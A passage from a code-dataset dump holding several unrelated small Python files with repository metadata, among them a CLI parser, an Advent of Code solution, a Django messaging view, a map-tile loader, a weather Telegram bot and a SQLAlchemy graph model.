parser_run.add_argument('experiment')\n parser_run.add_argument('-f', '--genfile', required=True)\n parser_run.add_argument('-n', '--name', required=True)\n parser_run.add_argument('-e', '--env')\n parser_run.set_defaults(func=cmd.run)\n\n # check\n parser_check.add_argument('session_id', type=int, nargs='?')\n parser_check.set_defaults(func=cmd.check)\n\n # stop\n parser_stop.add_argument('session_id', type=int, nargs='?')\n parser_stop.set_defaults(func=cmd.stop)\n\n # clean\n parser_clean.add_argument('session_id', type=int, nargs='?')\n parser_clean.set_defaults(func=cmd.clean)\n\n # set\n subparsers_set = parser_set.add_subparsers()\n parser_set_exp = subparsers_set.add_parser('experiment-dir')\n parser_set_env = subparsers_set.add_parser('environment-dir')\n # set experiment-dir\n parser_set_exp.add_argument('dir')\n parser_set_exp.set_defaults(func=cmd.set_experiment_dir)\n # set environment-dir\n parser_set_env.add_argument('dir')\n parser_set_env.set_defaults(func=cmd.set_environment_dir)\n\n # env\n parser_env.add_argument('keyval')\n parser_env.set_defaults(func=cmd.set_ctip_env_variable)\n\n # tables\n parser_tables.set_defaults(func=cmd.tables)\n\n # list\n parser_list.add_argument('table_name')\n parser_list.add_argument('where_clause', nargs='*')\n parser_list.set_defaults(func=cmd.list)\n\n # update\n subparsers_update = parser_update.add_subparsers()\n parser_update_status = subparsers_update.add_parser('status')\n parser_update_id = subparsers_update.add_parser('id')\n # update status\n parser_update_status.add_argument('job_id')\n parser_update_status.add_argument('new_status')\n parser_update_status.set_defaults(func=cmd.update_status)\n # update id\n parser_update_id.add_argument('job_id')\n parser_update_id.add_argument('new_id')\n parser_update_id.set_defaults(func=cmd.update_id)\n\n # log\n subparsers_log = parser_log.add_subparsers()\n parser_log_start = subparsers_log.add_parser('start')\n parser_log_pause = subparsers_log.add_parser('pause')\n parser_log_resume = subparsers_log.add_parser('resume')\n parser_log_end = subparsers_log.add_parser('end')\n parser_log.add_argument('job_id')\n # log start\n parser_log_start.set_defaults(func=cmd.log_start)\n # log pause\n parser_log_pause.set_defaults(func=cmd.log_pause)\n # log resume\n parser_log_resume.set_defaults(func=cmd.log_resume)\n # log end\n parser_log_end.set_defaults(func=cmd.log_end)\n\n return parser","repo_name":"arockett/ctip","sub_path":"ctip/entrypoint.py","file_name":"entrypoint.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"8649399770","text":"import itertools as it\nimport logging\nimport operator\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Iterable, Iterator, Protocol\n\nfrom ..cli_utils import wrap_main\nfrom ..io_utils import get_stripped_lines\nfrom ..logs import setup_logging\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass InterpreterState:\n x: int = 1\n\n\nclass Instruction(Protocol):\n def __call__(self, state: InterpreterState) -> Iterable[None]:\n ...\n\n\nclass Noop:\n def __call__(self, state: InterpreterState) -> Iterable[None]:\n yield\n\n\n@dataclass\nclass AddX:\n increment: int\n\n def __call__(self, state: InterpreterState) -> Iterable[None]:\n yield\n yield\n state.x += self.increment\n\n\ndef parse_instruction(line: str) -> Instruction:\n if line == \"noop\":\n return Noop()\n elif line.startswith(\"addx\"):\n name, 
value_str = line.split(\" \")\n return AddX(increment=int(value_str))\n else:\n raise ValueError(f\"Unknown instruction {line}\")\n\n\ndef load_program(filename: Path) -> list[Instruction]:\n return [parse_instruction(line) for line in get_stripped_lines(filename)]\n\n\nclass Interpreter:\n current_instruction: Instruction\n current_op: Iterator[None]\n\n def __init__(self, program: list[Instruction]) -> None:\n self.state = InterpreterState()\n logger.debug(\"Intializing interpreter with state %s\", self.state)\n self.instructions = it.cycle(program)\n self.shift_instruction()\n\n def shift_instruction(self) -> None:\n self.current_instruction = next(self.instructions)\n self.current_op = iter(self.current_instruction(self.state))\n logger.info(\"Shifted to instruction %s\", self.current_instruction)\n\n def step(self) -> None:\n logger.debug(\n \"Stepping with state %s @ %s\", self.state, self.current_instruction\n )\n try:\n next(self.current_op)\n except StopIteration:\n logger.debug(\"Instruction %s finished\", self.current_instruction)\n self.shift_instruction()\n next(self.current_op)\n else:\n logger.debug(\n \"Stepped with state %s @ %s\", self.state, self.current_instruction\n )\n\n def run(self, cycles: int) -> Iterable[int]:\n for _ in range(cycles):\n self.step()\n yield self.state.x\n\n\n@wrap_main\ndef main(filename: Path) -> str:\n program = load_program(filename)\n interpreter = Interpreter(program)\n states = interpreter.run(220)\n cycles = it.count(1)\n cycle_state = zip(states, cycles)\n interesting: Iterable[tuple[int, int]] = it.islice(cycle_state, 19, None, 40)\n interesting = list(interesting)\n logger.info(\"Interesting states: %s\", interesting)\n signal_strengths = it.starmap(operator.mul, interesting)\n total = sum(signal_strengths)\n return str(total)\n\n\nif __name__ == \"__main__\":\n setup_logging()\n main()\n","repo_name":"kurazu/advent_of_code_2022","sub_path":"advent/day_10/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35468086453","text":"from cars.forms import MessageForm\nfrom cars.models import Messages, Cars\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\nfrom django.http import HttpResponseNotFound\nfrom django.shortcuts import render, redirect\n\n\n# id user, id makine, useragent, ip, daten\ndef Index(request, username=None):\n if username:\n other_user = User.objects.filter(username=username).first()\n\n if not other_user:\n return HttpResponseNotFound(\"User not found\")\n\n # mesazhe te cilat na kane ardhur nga sender\n # mesazhet qe ne i kemi derguar senderit\n messages = Messages.objects \\\n .filter(Q(sender=other_user, recipient=request.user) | Q(sender=request.user, recipient=other_user)) \\\n .order_by('id')\n else:\n messages = []\n\n user_ids = Messages.objects.filter(recipient=request.user).values('sender').distinct()\n bisedat = User.objects.filter(id__in=user_ids)\n form = MessageForm()\n\n return render(request, 'messages/index.html', {\n \"messages\": messages,\n \"bisedat_user\": bisedat,\n \"username\": username,\n 'form': form\n })\n\n\ndef SendMessage(request, username):\n recipient = User.objects.filter(username=username).first()\n\n if not recipient:\n return None # 404 ketu\n\n form = MessageForm(request.POST)\n if form.is_valid():\n message = form.save(commit=False)\n message.sender = request.user\n message.recipient = recipient\n message.save()\n\n return 
redirect('messages_from_user', username)\n","repo_name":"G3nt1/Car_storeMarket","sub_path":"cars/views/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27606469993","text":"import urllib.request\nfrom PIL import Image\nimport io\nimport concurrent.futures\n\ndef imageFor(base_url, bbox_lon0, bbox_lat0, bbox_lon1, bbox_lat1, img_width, img_height, degrees_per_tile, max_tiles):\n #Linearly map a->b\n def mapcoord(a0,a1,b0,b1,b2):\n da=a1-a0\n db=b1-b0\n l=(b2-b0)/db\n return a0+l*da\n\n #Calculate the image size and size fo each tile to get the required degrees/tile\n def setup(bbox_lon0, bbox_lat0, bbox_lon1, bbox_lat1, img_width, img_height, degrees_per_tile):\n\n dlon=bbox_lon1-bbox_lon0\n dlat=bbox_lat1-bbox_lat0\n\n #Need at least one dimension\n if img_width==0 and img_height==0: return False\n\n if img_width==0:\n degrees_per_pixel=dlat/img_height\n img_width=int(dlon/degrees_per_pixel)\n elif img_height==0:\n degrees_per_pixel=dlon/img_width\n img_height=int(dlat/degrees_per_pixel)\n else:\n degrees_per_pixel=max(dlon/img_width, dlat/img_height)\n\n tilesize=int(degrees_per_tile/degrees_per_pixel)\n #print('W='+str(img_width)+'H='+str(img_height)+'T='+str(tilesize))\n largest_dim = img_width if img_width>img_height else img_width\n if tilesize>largest_dim*2: tilesize=largest_dim*2\n if tilesize<20: tilesize=20\n #print(str(tilesize))\n return (img_width, img_height, tilesize)\n\n #Parallelisable routine to load tile and save its position in the image\n def loadtile(tilespec, timeout):\n with urllib.request.urlopen(tilespec['url']) as req:\n f = io.BytesIO(req.read())\n tileimg = Image.open(f)\n return {'tileimg':tileimg,'pos':tilespec['pos']}\n\n #Setup configuration\n if degrees_per_tile==0: degrees_per_tile=99999999999 #Just load one single fullsize (square) image\n (Width,Height,TileSize)=setup(bbox_lon0, bbox_lat0, bbox_lon1, bbox_lat1, img_width, img_height, degrees_per_tile)\n\n #Iterate over all tiles and create url requests\n tilespecs=[] #url and x,y position in final image\n for x in range(0,Width,TileSize):\n for y in range(0,Height,TileSize):\n bblon0=mapcoord(bbox_lon0,bbox_lon1,0,Width,x)\n bblon1=mapcoord(bbox_lon0,bbox_lon1,0,Width,x+TileSize)\n bblat0=mapcoord(bbox_lat0,bbox_lat1,0,Height,y)\n bblat1=mapcoord(bbox_lat0,bbox_lat1,0,Height,y+TileSize)\n bbox=str(bblon0)+\",\"+str(bblat0)+\",\"+str(bblon1)+\",\"+str(bblat1)\n url=base_url+\"&SERVICE=WMS&VERSION=1.1.1&REQUEST=GetMap&BBOX=\"+bbox+\"&SRS=EPSG:27700&WIDTH=\"+str(TileSize)+\"&HEIGHT=\"+str(TileSize)+\"&format=image%2Fpng\"\n #print(url)\n tilespecs.append({'url':url,'pos':(x, Height-TileSize-y)})\n\n #Short circuit if we are about to ask the server for too many tiles\n if len(tilespecs)>max_tiles: return False\n\n #Create workers to load each tile\n tileobjs=[]\n with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:\n future_to_url = {executor.submit(loadtile, tilespec, 60): tilespec['url'] for tilespec in tilespecs}\n for future in concurrent.futures.as_completed(future_to_url):\n try:\n tileobj = future.result()\n except Exception as exc:\n print('%r generated an exception: %s' % (future_to_url[future], exc))\n else:\n tileobjs.append(tileobj)\n\n #Combine the tiles into the final image\n img=Image.new(\"RGBA\",(Width,Height))\n for tileobj in tileobjs:\n img.paste(tileobj['tileimg'],tileobj['pos'])\n return 
img\n\n","repo_name":"DuncanRowland/EasyMap_Shim","sub_path":"loadimage.py","file_name":"loadimage.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35782630926","text":"from blockchains import Blockchain\n\ndef main():\n chain1=Blockchain()\n chain2=Blockchain()\n \n \n\n candidate1=input('Enter first candidate name')\n candidate2=input('Enter second candidate name')\n cand1_votes=0\n cand2_votes=0\n voters_id=[101,102,103,104,105,106]\n no_of_voters=len(voters_id)\n print('no of voters:',no_of_voters)\n voted=[]\n while True:\n if voters_id==[]:\n print('voting is over')\n if cand1_votes>cand2_votes:\n print(f\"{candidate1} won the election with {cand1_votes}\")\n print('AND THE VOTES FOR {candidate1} ARE:')\n chain1.print_blockchain()\n elif cand2_votes>cand1_votes:\n print(f\"{candidate2} won the election with {cand2_votes}\")\n print('AND THE VOTES FOR {candidate2} ARE:')\n chain2.print_blockchain()\n elif cand1_votes==cand2_votes:\n print('tied!!')\n chain1.print_blockchain()\n chain2.print_blockchain()\n break\n else:\n voter=int(input('Enter your Id:'))\n if voter in voted:\n print('you already voted')\n else:\n if voter in voters_id:\n \n print(f\"1.{candidate1}\\n2.{candidate2}\")\n choice=int(input('Enter your choice'))\n if choice==1:\n chain1.add_block(voter)\n cand1_votes+=1\n print(f\"you voted {candidate1}\")\n elif choice==2:\n chain2.add_block(voter)\n cand2_votes+=1\n print(f\"you voted {candidate2}\")\n voters_id.remove(voter)\n voted.append(voter)\n else:\n print('you are not allowed to vote')\nif __name__ == '__main__':\n\tmain()","repo_name":"Saiber440/Voting-Backend","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"117556451","text":"if __name__ == '__main__':\n n = int(raw_input())\n student_marks = {}\n student_avg = {}\n for _ in range(n):\n line = raw_input().split()\n name, scores = line[0], line[1:]\n #print(scores)\n scores = map(float, scores)\n #print(scores)\n student_marks[name] = scores\n student_avg[name] = sum(scores)/len(scores)\n query_name = raw_input()\n print(\"{:.2f}\".format(student_avg[query_name]))","repo_name":"Rameshganesan/Mypython","sub_path":"format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24063578511","text":"class Shopping:\n def __init__(self,name):\n self.name = name\n self.cart = []\n # this cart is instance attribute\n\n def add_to_cart(self,item_name, price, quantity):\n # ekta product dictionary banabo\n product = {'item' : item_name, 'price': price, 'quantity':quantity}\n self.cart.append(product)\n\n isRemoved = False\n def remove_item(self,item_name):\n for things in self.cart:\n if things['item'] == item_name:\n self.isRemoved = True\n self.cart.remove(things)\n\n\n\n def checkOut(self,amount):\n total = 0\n for things in self.cart:\n total = total + (things['quantity'] * things['price'])\n print (f'Your Total Bill is : {total}')\n\n print(f'You Have Given {amount} tk')\n if amount < total:\n print(f'Sir, Please Provide {total-amount} tk More')\n else:\n if self.isRemoved:\n print(f\"item removed successfully\")\n print(f\"Here's your products and Change {amount-total} tk\")\n\n\nmoshiur = 
Shopping(\"Moshiuzzaman\")\nmoshiur.add_to_cart('Alu',50,6)\nmoshiur.add_to_cart('Onion',70,5)\nmoshiur.add_to_cart('Chille',140,1)\nmoshiur.add_to_cart(\"Ice-Cream\",1,50)\nmoshiur.remove_item('Ice-Cream')\n\n\nprint()\nprint(f'{moshiur.name} is purchasing : ')\nprint('******************************')\n\n\nmoshiur.checkOut(1000)\n# for things in moshiur.cart:\n # print(f\"{things['item']} -------- {things['quantity']} -------- {things['price']}\")\n","repo_name":"arafat-yasin-2413/PYTHON_and_OOP","sub_path":"WEEK -2/Mod 5/6_shopping_practice.py","file_name":"6_shopping_practice.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"783318000","text":"import argparse\n\nimport numpy as np\n\nfrom train import test_seed, f_sampler\n\ncline_parser = argparse.ArgumentParser(description='Calculate minimal detectable fraction',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n\ndef add_arg(*pargs, **kwargs):\n cline_parser.add_argument(*pargs, **kwargs)\n\n\nadd_arg('--f_src', type=float, help='fraction of \"from-source\" EECRs [0,1] or -1 for random', default=-1)\nadd_arg('--Neecr', type=int, help='Total number of EECRs in each sample', default=500)\nadd_arg('--Emin', type=int, help='Emin in EeV for which the input sample was generated', default=28)\nadd_arg('--EminData', type=float, help='minimal data energy in EeV', default=56)\n# add_arg('--source_id', type=str,\n# help='source (CenA, NGC253, M82, M87 or FornaxA) or comma separated list of sources or \"all\"',\n# default='CenA')\nadd_arg('sources', type=str, nargs='+', metavar='source', default=[])\nadd_arg('--fractions', type=float, nargs='+', metavar='frac', help='fractions for mixed source case (in the same order as sources)', default=[])\nadd_arg('--Nside', type=int, help='healpix grid Nside parameter', default=32)\nadd_arg('--Nini', type=int, help='Size of the initial sample of from-source events', default=10000)\nadd_arg('--source_vicinity_radius', type=str, help='source vicinity radius', default='1')\nadd_arg('--log_sample', action='store_true', help=\"sample f_src uniformly in log scale\")\nadd_arg('--f_src_max', type=float, help='maximal fraction of \"from-source\" EECRs [0,1]', default=1)\nadd_arg('--f_src_min', type=float, help='minimal fraction of \"from-source\" EECRs [0,1]', default=0)\nadd_arg('--model', type=str, help='healpix NN', default='')\nadd_arg('--n_samples', type=int, help='number of samples', default=50000)\nadd_arg('--alpha', type=float, help='type 1 maximal error', default=0.01)\nadd_arg('--beta', type=float, help='type 2 maximal error', default=0.05)\nadd_arg('--suffix', type=str, default='*')\nadd_arg('--batch_size', type=int, help='size of training batch', default=100)\nadd_arg('--mf', type=str, help='Magnetic field model (jf or pt)', default='jf')\nadd_arg('--data_dir', type=str, help='data root directory (should contain jf/sources/ or pt/sources/)',\n default='data')\nadd_arg('--threshold', type=float,\n help='source fraction threshold for binary classification', default=0.0)\nadd_arg('--sigmaLnE', type=float, help='deltaE/E energy resolution', default=0.2)\nadd_arg('--seed', type=int, help='sample generator seed', default=test_seed)\nadd_arg('--exclude_energy', action='store_true', help='legacy mode without energy as extra observable')\nadd_arg('--exposure', type=str, help='exposure: uniform/TA', default='uniform')\nadd_arg('--n_iterations', type=int, help='increase number of iterations for more 
precise result', default=1)\n\nargs = cline_parser.parse_args()\nif len(args.fractions) > 0:\n assert len(args.fractions) == len(args.sources) and len(args.sources) > 1\n\ntry:\n import train_healpix\n model = train_healpix.create_model(12*args.Nside*args.Nside, pretrained=args.model)\n Generator = train_healpix.SampleGenerator\nexcept:\n import train_gcnn\n model = train_gcnn.create_model(args.Neecr, pretrained=args.model)\n Generator = train_gcnn.SampleGenerator\n\ntest_batches = (args.seed == test_seed)\nif not test_batches:\n np.random.seed(args.seed)\n\ngen = Generator(\n args, deterministic=test_batches, sources=args.sources, suffix=args.suffix, seed=args.seed, mixture=args.fractions)\n\nfrom beta import calc_detectable_frac\nfrac, alpha = calc_detectable_frac(gen, model, args, n_iterations=args.n_iterations)\n\nout_file = args.model + \"_cmp.txt\"\nwith open(out_file, \"a\") as d:\n print(\"Model to compare with:\", file=d)\n print(*args.sources, file=d)\n if len(args.fractions) > 0:\n print('fractions:', *args.fractions, file=d)\n print(\"Neecr={:3d}\".format(args.Neecr), file=d)\n print(\"Nmixed_samples={:5d}\".format(args.n_samples), file=d)\n d.write(\"frac={:7.2f}\\n\".format(frac*100))\n d.write(\"alpha={:6.4f}\\n\".format(alpha))\n d.write(\"------------------------------\\n\")\n","repo_name":"okolo/ml_cr_aniso","sub_path":"src/calc_min_fractions.py","file_name":"calc_min_fractions.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"5536787235","text":"from sqlalchemy import create_engine, Column, String, Text, ForeignKey\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, sessionmaker, backref, relationship, object_session, Session\nfrom sqlalchemy.ext.hybrid import hybrid_property, hybrid_method\nfrom multiprocessing import Lock\n\nimport uuid\nimport json\nfrom .seralizer import SerializerInterface\n\nmutex = Lock()\ncurrent_engines = {}\n\n# def init_db():\n# Model.metadata.create_all(bind=engine)\n\n# https://docs.sqlalchemy.org/en/14/orm/join_conditions.html\nDBModel = declarative_base(name='DBModel')\n\n\nclass DBGraph:\n def __init__(self, db_name: str, root=None):\n self.name = db_name\n\n global current_engines, mutex\n engine = None\n with mutex:\n if self.name in current_engines.keys():\n engine = current_engines[self.name]['engine']\n current_engines[self.name]['sessions'] += 1\n else:\n\n engine = create_engine('sqlite:///' + self.name,\n convert_unicode=True)\n DBModel.metadata.create_all(bind=engine)\n\n with engine.connect() as con:\n con.execute(\"PRAGMA foreign_keys = TRUE;\")\n current_engines.update({self.name: {\"engine\": engine, \"sessions\": 1}})\n\n self.session = scoped_session(sessionmaker(autocommit=False,\n autoflush=False,\n bind=engine))\n DBModel.query = self.session.query_property()\n\n def __del__(self):\n # self.close()\n global current_engines, mutex\n with mutex:\n if self.name in current_engines.keys():\n current_engines[self.name]['sessions'] -= 1\n if current_engines[self.name]['sessions'] == 0:\n engine = current_engines[self.name]['engine']\n # if engine:\n # engine.close()\n del current_engines[self.name]\n\n\nclass DBRelation(DBModel, SerializerInterface):\n __tablename__ = 'relationship'\n source_id = Column('source', String(36), ForeignKey(\"nodes.id\"), primary_key=True)\n target_id = Column('target', String(36), ForeignKey(\"nodes.id\"), primary_key=True)\n relation = 
Column('relation', Text)\n _properties = Column('properties', Text)\n\n source = relationship(\"DBNode\", primaryjoin=\"DBRelation.source_id == DBNode.id\",\n backref=backref('relation_targets', lazy='dynamic'))\n target = relationship(\"DBNode\", primaryjoin=\"DBRelation.target_id == DBNode.id\",\n backref=backref('relation_sources', lazy='dynamic'))\n\n def __init__(self, source, relation: str, target, properties={}):\n self.relation = relation\n self._properties = json.dumps(properties)\n source.relation_targets.append(self)\n target.relation_sources.append(self)\n\n @hybrid_property\n def properties(self):\n return self._properties\n\n @properties.setter\n def properties(self, properties: {}):\n self._properties = json.dumps(properties)\n\n @properties.getter\n def properties(self):\n return json.loads(self._properties)\n\n def to_dict(self):\n return dict(source=self.source_id, target=self.target_id, relation=self.relation, properties=self.properties)\n\n\nclass DBNode(DBModel, SerializerInterface):\n __tablename__ = 'nodes'\n id = Column('id', String(36), primary_key=True, index=True)\n name = Column('name', String(64))\n _body = Column('body', Text)\n _types = Column('types', Text)\n\n def __init__(self, name, types=[], body={}, id=str(uuid.uuid4())):\n self.id = id\n self.name = name\n self._body = json.dumps(body)\n self._types = ','.join(types) # .lower()\n\n @hybrid_property\n def body(self):\n return self._body\n\n @body.setter\n def body(self, body: {}):\n self._body = json.dumps(body)\n\n @body.getter\n def body(self):\n return json.loads(self._body)\n\n @hybrid_property\n def types(self):\n return self._types\n\n @types.setter\n def types(self, types):\n self._types = ','.join(types)\n\n @hybrid_method\n def types(self):\n return self._types.split(\",\")\n\n @hybrid_method # property\n def targets(self, relations=None, iterate=False):\n result = []\n uniques = []\n\n def search(node: DBNode):\n query = object_session(node).query(DBNode) \\\n .filter(DBRelation.target_id == DBNode.id)\n res = []\n if relations:\n res = query.filter(DBRelation.source_id == node.id,\n DBRelation.relation.in_(tuple(relations))).all()\n else:\n res = query.filter(DBRelation.source_id == node.id).all()\n\n if res:\n for elem in res:\n print(elem.to_dict())\n if not elem.id in uniques:\n result.append(elem)\n uniques.append(elem.id)\n if iterate:\n search(elem)\n\n search(self)\n return result\n\n def to_dict(self):\n return dict(id=self.id, name=self.name, body=self.body, types=self.types())\n","repo_name":"DigiFors/dfgraph","sub_path":"src/dfgraph/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30322226827","text":"import os\nimport sys\n\n\ndef make_cp_file(args):\n source = args[0]\n destination = args[1]\n with open(source) as src:\n lines = [l.strip() for l in src if l.strip()]\n with open(destination, 'w') as dst:\n dst.write(os.pathsep.join(lines))\n\n\nif __name__ == '__main__':\n make_cp_file(sys.argv[1:])\n","repo_name":"nslsrv/takewithya","sub_path":"build/scripts/make_java_classpath_file.py","file_name":"make_java_classpath_file.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5464638836","text":"import requests\nimport pprint\nimport datetime\n\nfrom telega_bot import bot_conf\n\nAPI_KEY = bot_conf.OPENWEATHERMAP_API_KEY\nURL = 
\"http://api.openweathermap.org/data/2.5/weather?q={}&units=metric&appid={}\"\nURL_BY_CITY_ID = \"http://api.openweathermap.org/data/2.5/weather?id={}&units=metric&appid={}\"\nURL_TOMORROW_BY_CITY_ID = \"http://api.openweathermap.org/data/2.5/forecast?id={}&units=metric&appid={}\"\n\n# Openweathermap Weather codes and corressponding emojis\nthunderstorm = u'\\U0001F4A8' # Code: 200's, 900, 901, 902, 905\ndrizzle = u'\\U0001F4A7' # Code: 300's\nrain = u'\\U00002614' # Code: 500's\nsnowflake = u'\\U00002744' # Code: 600's snowflake\nsnowman = u'\\U000026C4' # Code: 600's snowman, 903, 906\natmosphere = u'\\U0001F301' # Code: 700's foogy\nclear_sky = u'\\U00002600' # Code: 800 clear sky\nfew_clouds = u'\\U000026C5' # Code: 801 sun behind clouds\nclouds = u'\\U00002601' # Code: 802-803-804 clouds general\nhot = u'\\U0001F525' # Code: 904\ndefault_emoji = u'\\U0001F300' # default emojis\n\n\ndef get_emoji(weather_id):\n if weather_id:\n if str(weather_id)[0] == '2' or weather_id == 900 or weather_id == 901 or weather_id == 902 or weather_id == 905:\n return thunderstorm\n elif str(weather_id)[0] == '3':\n return drizzle\n elif str(weather_id)[0] == '5':\n return rain\n elif str(weather_id)[0] == '6' or weather_id == 903 or weather_id == 906:\n return snowflake + ' ' + snowman\n elif str(weather_id)[0] == '7':\n return atmosphere\n elif weather_id == 800:\n return clear_sky\n elif weather_id == 801:\n return few_clouds\n elif weather_id == 802 or weather_id == 803 or weather_id == 804:\n return clouds\n elif weather_id == 904:\n return hot\n else:\n return default_emoji # Default emoji\n\n else:\n return default_emoji # Default emoji\n\n\ndef get_temp_by_city_name(city):\n resp = requests.get(URL.format(city, API_KEY))\n if resp.status_code == 200:\n temp = resp.json()['main']['temp']\n else:\n temp = 'NaN'\n return temp\n\n\ndef get_temp_by_city_id(city_id):\n resp = requests.get(URL_BY_CITY_ID.format(city_id, API_KEY))\n if resp.status_code == 200:\n temp = resp.json()['main']['temp']\n feels_like = resp.json()['main']['feels_like']\n wind = resp.json()['wind']['speed']\n main = resp.json()['weather'][0]['description'][0].upper() + resp.json()['weather'][0]['description'][1:] \\\n + ' ' + get_emoji(resp.json()['weather'][0]['id'])\n\n else:\n temp = 'NaN'\n feels_like = 'NaN'\n wind = 'NaN'\n main = 'NaN'\n return temp, feels_like, wind, main\n\n\ndef get_temp_tomorrow_by_city_id(city_id):\n resp = requests.get(URL_TOMORROW_BY_CITY_ID.format(city_id, API_KEY))\n if resp.status_code == 200:\n text = \"{}\\n\".format(resp.json()['city']['name'])\n\n find_six_morning = 0\n for find_six_morning in range(len(resp.json()['list'])):\n if '06:00:00' in resp.json()['list'][find_six_morning]['dt_txt']:\n break\n\n for i in range(find_six_morning, find_six_morning+5, 2):\n dt = datetime.datetime.utcfromtimestamp(resp.json()['list'][i]['dt']).strftime('%m.%d %H:%M')\n temp = resp.json()['list'][i]['main']['temp']\n feels_like = resp.json()['list'][i]['main']['feels_like']\n wind = resp.json()['list'][i]['wind']['speed']\n main = resp.json()['list'][i]['weather'][0]['description'][0].upper() + \\\n resp.json()['list'][i]['weather'][0]['description'][1:] \\\n + ' ' + get_emoji(resp.json()['list'][i]['weather'][0]['id'])\n\n text += \"{}\\n\\U0001F321 {}\\nFeels like: {}\\nWind: {} m/s\\n{}\\n\\n\".\\\n format(dt, temp, feels_like, wind, main)\n else:\n text = 'NaN'\n return text\n\n\nif __name__ == '__main__':\n city = \"New York City\"\n r = get_temp_by_city_name(city)\n print(r)\n\n # resp = 
requests.get(URL.format(city, API_KEY)).json()\n # print(resp)\n\n r = requests.get(URL_BY_CITY_ID.format(591260, API_KEY))\n pprint.pprint(r.json())\n","repo_name":"masb3/telega_bot","sub_path":"telega_bot/openweathermap.py","file_name":"openweathermap.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24348223717","text":"#!/usr/bin/python3\n\nimport pngcanvas\nimport cgi\nimport jsonsinglequote\nimport math\nimport cgitb; cgitb.enable()\n\ncache = 'postcache'\n\ndef if_else(condition, trueVal, falseVal):\n if condition:\n return trueVal\n else:\n return falseVal\n\ndef safe_ternary(x, conditionfn, truefn, falsefn):\n if (conditionfn(x)):\n return truefn(x)\n else:\n return falsefn(x)\n\nfnInfo = {\n 'num': {'children': 0, 'aux': 'val'},\n 'x': {'children': 0},\n 'y': {'children': 0},\n 'atan': {'children': 1, 'needsMap' : True},\n 'abs': {'children': 1},\n 'cos': {'children': 1},\n 'exp': {'children': 1, 'needsMap' : True},\n 'log': {'children': 1, 'needsMap' : True},\n 'neg': {'children': 1},\n 'rd': {'children': 1},\n 'ru': {'children': 1},\n 'sin': {'children': 1},\n 'add': {'children': 2, 'needsMap' : True},\n 'div': {'children': 2, 'needsMap' : True},\n 'mul': {'children': 2, 'needsMap' : True},\n 'sub': {'children': 2, 'needsMap' : True},\n 'ccrgb': {'children': 3},\n 'cchsl': {'children': 3}}\n\n\n\n# Mapping strategies ensure the result is coerced to [-1,1]\n# 'c' means clip to [-1,1]\n# 'w' means wrap to [-1,1]\ndef makeMappingStrategy(jsonObj):\n return {\n 'c': (lambda v: (if_else(v > 1, 1, if_else(v < -1, -1, v)))),\n 'w': (lambda v: (if_else(v == 1, 1, ((v+1)%2.0)-1)))\n }[jsonObj['m']]\n\ndef makeMappingStrategyList(jsonObj):\n return {\n 'c': (lambda l: [if_else(v > 1, 1, if_else(v < -1, -1, v)) for v in l]),\n 'w': (lambda l: [if_else(v == 1, 1, ((v+1)%2.0)-1) for v in l])\n }[jsonObj['m']]\n\ndef finalHslToRgb(tc, q, p):\n if (tc < (1.0/6.0)):\n return p + ((q - p) * 6.0 * tc)\n elif (tc < (1.0/2.0)):\n return q\n elif (tc < (2.0/3.0)):\n return p + ((q - p) * ((2.0/3.0) - tc) * 6.0)\n else:\n return p\n\ndef hslToRgb(c, x, y):\n # get grayscale values for c[0], 1, 2?\n hOrig = 0.3 * c[0][0] + 0.59 * c[0][1] + 0.11 * c[0][2]\n sOrig = 0.3 * c[1][0] + 0.59 * c[1][1] + 0.11 * c[1][2]\n lOrig = 0.3 * c[2][0] + 0.59 * c[2][1] + 0.11 * c[2][2]\n # Scale h, s and l to be 0 to 1\n h = (hOrig + 1.0) / 2.0\n s = (sOrig + 1.0) / 2.0\n l = (lOrig + 1.0) / 2.0\n if (s == 0.0):\n return [(l * 2.0 - 1.0) for i in range(0, 3)]\n if (l < 0.5):\n q = l * (1.0 + s)\n else:\n q = l + s - (l * s)\n p = 2.0 * l - q\n tr = h + (1.0/3.0)\n tg = h\n tb = h - (1.0/3.0)\n if (tr < 0.0):\n tr += 1.0\n elif (tr > 1.0):\n tr -= 1.0\n if (tg < 0.0):\n tg += 1.0\n elif (tg > 1.0):\n tg -= 1.0\n if (tb < 0.0):\n tb += 1.0\n elif (tb > 1.0):\n tb -= 1.0\n cr = finalHslToRgb(tr, q, p)\n cg = finalHslToRgb(tg, q, p)\n cb = finalHslToRgb(tb, q, p)\n return [(cr * 2.0 - 1.0), (cg * 2.0 - 1.0), (cb * 2.0 - 1.0)]\n \ndef 